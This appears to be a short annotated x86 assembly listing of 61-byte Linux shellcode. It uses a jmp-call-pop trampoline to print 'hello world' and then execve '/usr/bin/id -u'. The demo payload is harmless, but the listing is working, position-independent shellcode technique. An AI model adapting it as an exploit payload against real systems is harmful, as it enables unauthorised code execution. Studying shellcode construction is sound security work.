61 byte shellcode

1. [bits 32]  
2. ; the following is 61 bytes when assembled
3.     push byte 0x4   ; 0x4 == sys_write
4.     pop eax         ;
5.     lea edx, [eax + eax*2] ; string length to print == 12
6.    
7.     push byte 0x1   ; where to write, 0x1 == stdout
8.     jmp SHORT data_segment
9. _databack:
10.     ; first time here pops pointer to mystr
11.     ; 2nd time pops pointer pointer argv
12.     pop ecx
13.    
14.     ; first time here pops 0x1
15.     ; 2nd time pops pointer argv[0]
16.     pop ebx;
17.     int 0x80    ; execute syscall
18.    
19.     cdq             ; zero edx
20.     push edx        ; zero terminate argv
21.     lea ecx, [ecx+2*eax]; point to arg1 str
22.     push ecx        ; arg1
23.     dec ecx     ; point to end of previous string
24.     mov [ecx],dl    ; zero terminate arg0
25.     dec eax     ; eax holds returnvalue of 12 (length of str printet)
26.     sub ecx, eax    ; point to beginning of arg0
27.     push ecx        ; arg0
28.     push esp    ; esp is a pointer pointer to argv
29.     jmp SHORT _databack
30. data_segment:
31.     call _databack ; trampoline
32.     mystr db "hello world",0xa,"/usr/bin/id -u"